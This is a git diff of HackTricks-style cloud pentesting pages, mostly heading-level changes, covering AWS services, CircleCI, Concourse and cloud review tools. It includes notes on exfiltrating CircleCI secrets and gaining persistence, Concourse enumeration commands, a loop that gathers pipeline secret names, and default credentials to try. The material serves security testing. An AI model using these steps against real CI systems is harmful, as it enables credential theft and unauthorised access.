AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources. AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources.
@ -899,7 +897,7 @@ A **rule group** (a set of WAF rules together) can be added to an AWS Firewall M
**Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option). **Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option).
## AWS Shield # AWS Shield
AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
@ -909,13 +907,13 @@ AWS Shield has been designed to help **protect your infrastructure against distr
Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.**
## VPN # VPN
### Site-to-Site VPN ## Site-to-Site VPN
**Connect your on premisses network with your VPC.** **Connect your on premisses network with your VPC.**
#### Concepts ### Concepts
* **VPN connection**: A secure connection between your on-premises equipment and your VPCs. * **VPN connection**: A secure connection between your on-premises equipment and your VPCs.
* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. * **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.
@ -926,7 +924,7 @@ Whereas the Standard version of Shield offered protection against layer three an
* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. * **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. * **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
#### Limitations ### Limitations
* IPv6 traffic is not supported for VPN connections on a virtual private gateway. * IPv6 traffic is not supported for VPN connections on a virtual private gateway.
* An AWS VPN connection does not support Path MTU Discovery. * An AWS VPN connection does not support Path MTU Discovery.
@ -935,11 +933,11 @@ In addition, take the following into consideration when you use Site-to-Site VPN
* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. * When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
### Components of Client VPN <a href="#what-is-components" id="what-is-components"></a> ## Components of Client VPN <a href="#what-is-components" id="what-is-components"></a>
**Connect from your machine to your VPC** **Connect from your machine to your VPC**
#### Concepts ### Concepts
* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. * **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. * **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
@ -952,7 +950,7 @@ In addition, take the following into consideration when you use Site-to-Site VPN
* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. * **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. * **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
#### Limitations ### Limitations
* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. * **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** * Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
@ -970,13 +968,13 @@ In addition, take the following into consideration when you use Site-to-Site VPN
``` ```
* The self-service portal is **not available for clients that authenticate using mutual authentication**. * The self-service portal is **not available for clients that authenticate using mutual authentication**.
## Amazon Cognito # Amazon Cognito
Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple. Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple.
The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together. The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together.
### **User pools** ## **User pools**
A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
@ -989,7 +987,7 @@ User pools provide:
* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. * Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification.
* Customized workflows and user migration through AWS Lambda triggers. * Customized workflows and user migration through AWS Lambda triggers.
### **Identity pools** ## **Identity pools**
With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools: With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools:

View file

@ -17,28 +17,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# CircleCI # Basic Information
## Basic Information
[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. [**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
## Permissions # Permissions
**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\ **CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...). In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**. However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
## Env Variables & Secrets # Env Variables & Secrets
According to [**the docs**](https://circleci.com/docs/2.0/env-vars/#) there are different ways to **load values in environment variables** inside a workflow. According to [**the docs**](https://circleci.com/docs/2.0/env-vars/#) there are different ways to **load values in environment variables** inside a workflow.
### Built-in env variables ## Built-in env variables
Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
### Clear text ## Clear text
You can declare them in clear text inside a **command**: You can declare them in clear text inside a **command**:
@ -82,7 +80,7 @@ jobs:
SECRET: A secret SECRET: A secret
``` ```
### Project Secrets ## Project Secrets
These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org\_name>/\<repo\_name>/environment-variables_ You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org\_name>/\<repo\_name>/environment-variables_
@ -93,7 +91,7 @@ You can see them **declared in** _https://app.circleci.com/settings/project/gith
The "**Import Variables**" functionality allows to **import variables from other projects** to this one. The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
{% endhint %} {% endhint %}
### Context Secrets ## Context Secrets
These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
@ -104,17 +102,17 @@ However, note that a different group (instead of All members) can be **selected
This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
{% endhint %} {% endhint %}
## Attacks # Attacks
### Search Clear Text Secrets ## Search Clear Text Secrets
If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there. If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
### Secret Env Vars & Context enumeration ## Secret Env Vars & Context enumeration
Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org\_name>/contexts_. Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org\_name>/contexts_.
### Exfiltrate Project secrets ## Exfiltrate Project secrets
{% hint style="warning" %} {% hint style="warning" %}
In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
@ -174,7 +172,7 @@ workflows:
- exfil-env - exfil-env
``` ```
### Exfiltrate Context Secrets ## Exfiltrate Context Secrets
You need to **specify the context name** (this will also exfiltrate the project secrets): You need to **specify the context name** (this will also exfiltrate the project secrets):
@ -235,7 +233,7 @@ workflows:
Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
{% endhint %} {% endhint %}
### Escape to Cloud ## Escape to Cloud
**CircleCI** gives you the option to run **your builds in their machines or in your own**.\ **CircleCI** gives you the option to run **your builds in their machines or in your own**.\
By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**. By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
@ -264,7 +262,7 @@ jobs:
version: 19.03.13 version: 19.03.13
``` ```
### Persistence ## Persistence
* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. * It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
* _https://app.circleci.com/settings/user/tokens_ * _https://app.circleci.com/settings/user/tokens_

View file

@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Cloud Security Review
**Check for nice cloud hacking tricks in** [**https://hackingthe.cloud**](https://hackingthe.cloud) **Check for nice cloud hacking tricks in** [**https://hackingthe.cloud**](https://hackingthe.cloud)
## Generic tools # Generic tools
There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section. There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section.
### [ScoutSuite](https://github.com/nccgroup/ScoutSuite) ## [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
@ -33,7 +31,7 @@ AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
pip3 install scoutsuite pip3 install scoutsuite
``` ```
### [cs-suite](https://github.com/SecurityFTW/cs-suite) ## [cs-suite](https://github.com/SecurityFTW/cs-suite)
AWS, GCP, Azure, DigitalOcean AWS, GCP, Azure, DigitalOcean
@ -46,11 +44,11 @@ pip install -r requirements.txt
python cs.py --help python cs.py --help
``` ```
### Nessus ## Nessus
Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**. Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**.
### Common Sense ## Common Sense
Take a look to the **network access rules** and detect if the services are correctly protected: Take a look to the **network access rules** and detect if the services are correctly protected:
@ -59,7 +57,7 @@ Take a look to the **network access rules** and detect if the services are corre
* Unprotected admin consoles? * Unprotected admin consoles?
* In general, check that all services are correctly protected depending on their needs * In general, check that all services are correctly protected depending on their needs
## Azure # Azure
Access the portal here: [http://portal.azure.com/](http://portal.azure.com)\ Access the portal here: [http://portal.azure.com/](http://portal.azure.com)\
To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
@ -70,7 +68,7 @@ Then, run `az login` to login. Note the **account information** and **token** wi
Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22)).\ Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22)).\
\_\_If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw\_wcB#microsoft-azure). \_\_If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw\_wcB#microsoft-azure).
### Run scanners ## Run scanners
Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**. Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**.
@ -91,11 +89,11 @@ pip3 install azure-cis-scanner #Install
azscan #Run, login before with `az login` azscan #Run, login before with `az login`
``` ```
### Attack Graph ## Attack Graph
[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work. [**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.
### More checks ## More checks
* Check for a **high number of Global Admin** (between 2-4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview) * Check for a **high number of Global Admin** (between 2-4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview)
* Global admins should have MFA activated. Go to Users and click on Multi-Factor Authentication button. * Global admins should have MFA activated. Go to Users and click on Multi-Factor Authentication button.
@ -117,15 +115,15 @@ azscan #Run, login before with `az login`
_Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_ _Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_
* **Lack of App Services restrictions**: Look for "App Services" in Azure ([https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)) and check if anyone is being used. In that case check go through each App checking for "Access Restrictions" and there aren't rules, report it. The access to the app service should be restricted according to the needs. * **Lack of App Services restrictions**: Look for "App Services" in Azure ([https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)) and check if anyone is being used. In that case check go through each App checking for "Access Restrictions" and there aren't rules, report it. The access to the app service should be restricted according to the needs.
## Office365 # Office365
You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features via the web application. You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features via the web application.
## AWS # AWS
Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx) Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx)
## GPC # GPC
{% content-ref url="gcp-security/" %} {% content-ref url="gcp-security/" %}
[gcp-security](gcp-security/) [gcp-security](gcp-security/)

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Concourse
**Concourse allows you to build pipelines to automatically run tests, actions and build images whenever you need it (time based, when something happens...)** **Concourse allows you to build pipelines to automatically run tests, actions and build images whenever you need it (time based, when something happens...)**
## Concourse Architecture # Concourse Architecture
Learn how the concourse environment is structured in: Learn how the concourse environment is structured in:
@ -29,7 +27,7 @@ Learn how the concourse environment is structured in:
[concourse-architecture.md](concourse-architecture.md) [concourse-architecture.md](concourse-architecture.md)
{% endcontent-ref %} {% endcontent-ref %}
## Run Concourse Locally # Run Concourse Locally
Learn how you can run a concourse environment locally to do your own tests in: Learn how you can run a concourse environment locally to do your own tests in:
@ -37,7 +35,7 @@ Learn how you can run a concourse environment locally to do your own tests in:
[concourse-lab-creation.md](concourse-lab-creation.md) [concourse-lab-creation.md](concourse-lab-creation.md)
{% endcontent-ref %} {% endcontent-ref %}
## Enumerate & Attack Concourse # Enumerate & Attack Concourse
Learn how you can enumerate the concourse environment and abuse it in: Learn how you can enumerate the concourse environment and abuse it in:
@ -45,7 +43,7 @@ Learn how you can enumerate the concourse environment and abuse it in:
[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md) [concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md)
{% endcontent-ref %} {% endcontent-ref %}
## References # References
* [https://concourse-ci.org/internals.html#architecture-worker](https://concourse-ci.org/internals.html#architecture-worker) * [https://concourse-ci.org/internals.html#architecture-worker](https://concourse-ci.org/internals.html#architecture-worker)

View file

@ -16,19 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Concourse Architecture
### Architecture # Architecture
![](<../../.gitbook/assets/image (651) (1) (1).png>) ![](<../../.gitbook/assets/image (651) (1) (1).png>)
#### ATC: web UI & build scheduler ## ATC: web UI & build scheduler
The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
#### TSA: worker registration & forwarding ## TSA: worker registration & forwarding
The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
@ -36,7 +35,7 @@ The TSA by **default listens on port `2222`**, and is usually colocated with the
The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
#### Workers ## Workers
In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Concourse Enumeration & Attacks # User Roles & Permissions
## User Roles & Permissions
Concourse comes with five roles: Concourse comes with five roles:
@ -35,14 +33,14 @@ Moreover, the **permissions of the roles owner, member, pipeline-operator and vi
Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
## Vars & Credential Manager # Vars & Credential Manager
In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\ In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\
The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\ The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
The **optional **_**secret-field**_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\ The **optional **_**secret-field**_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`. Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
### Static Vars ## Static Vars
Static vars can be specified in **tasks steps**: Static vars can be specified in **tasks steps**:
@ -59,7 +57,7 @@ Or using the following `fly` **arguments**:
* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. * `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. * `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
### Credential Management ## Credential Management
There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
Moreover, Concourse supports different credential managers: Moreover, Concourse supports different credential managers:
@ -78,11 +76,11 @@ Moreover, Concourse supports different credential managers:
Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
{% endhint %} {% endhint %}
## Concourse Enumeration # Concourse Enumeration
In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file. In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
### Login and Current User enum ## Login and Current User enum
* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: * To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
* `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
@ -93,7 +91,7 @@ In order to enumerate a concourse environment you first need to **gather valid c
* Get **role** of the user against the indicated target: * Get **role** of the user against the indicated target:
* `fly -t <target> userinfo` * `fly -t <target> userinfo`
### Teams & Users ## Teams & Users
* Get a list of the Teams * Get a list of the Teams
* `fly -t <target> teams` * `fly -t <target> teams`
@ -102,7 +100,7 @@ In order to enumerate a concourse environment you first need to **gather valid c
* Get a list of users * Get a list of users
* `fly -t <target> active-users` * `fly -t <target> active-users`
### Pipelines ## Pipelines
* **List** pipelines: * **List** pipelines:
* `fly -t <target> pipelines -a` * `fly -t <target> pipelines -a`
@ -125,7 +123,7 @@ cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt rm /tmp/secrets.txt
``` ```
### Containers & Workers ## Containers & Workers
* List **workers**: * List **workers**:
* `fly -t <target> workers` * `fly -t <target> workers`
@ -134,18 +132,18 @@ rm /tmp/secrets.txt
* List **builds** (to see what is running): * List **builds** (to see what is running):
* `fly -t <target> builds` * `fly -t <target> builds`
## Concourse Attacks # Concourse Attacks
### Credentials Brute-Force ## Credentials Brute-Force
* admin:admin * admin:admin
* test:test * test:test
### Secrets and params enumeration ## Secrets and params enumeration
In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them. In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
### Session inside running or recently run container ## Session inside running or recently run container
